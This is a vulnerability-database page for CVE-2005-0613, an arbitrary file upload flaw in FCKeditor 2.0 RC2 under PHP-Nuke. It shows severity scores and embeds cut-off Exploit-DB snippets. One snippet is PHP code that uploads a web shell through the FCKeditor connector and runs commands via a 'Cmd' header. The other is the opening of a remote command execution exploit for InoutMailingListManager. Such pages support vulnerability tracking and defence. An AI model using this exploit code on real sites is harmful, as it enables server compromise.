CVE-2005-0613
published 2005-02-28CVE-2005-0613: Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.
PriorityP433medium5CVSS 2.0
AVNACLAuNCNIPAN
EXPLOIT
EPSS
4.60%
90.5th percentile
Unknown vulnerability in FCKeditor 2.0 RC2, when used with PHP-Nuke, allows remote attackers to upload arbitrary files.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| fckeditor | fckeditor | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
exploitdb·2008-10-18
CVE-2008-6178 Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
Nuke ET 3.4 - 'FCKeditor' Arbitrary File Upload
---
\n";
$payload .= "--o0oOo0o--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Shell uploaded to {$filename}...starting it!\n";
$path .= str_repeat("../", substr_count($path, "/") - 1) . "UserFiles/File/"; // come back to the document root
$packet = "GET {$path}{$filename} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connectio
Exploit-DB
InoutMailingListManager 3.1 - Remote Command Execution
exploitdb·2007-04-10
CVE-2007-2004 InoutMailingListManager 3.1 - Remote Command Execution
InoutMailingListManager 3.1 - Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
Thanks to rgod for the php code and Marty for the Love
";
if ($argc
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(get
No writeups or analysis indexed.
2005-02-28
Published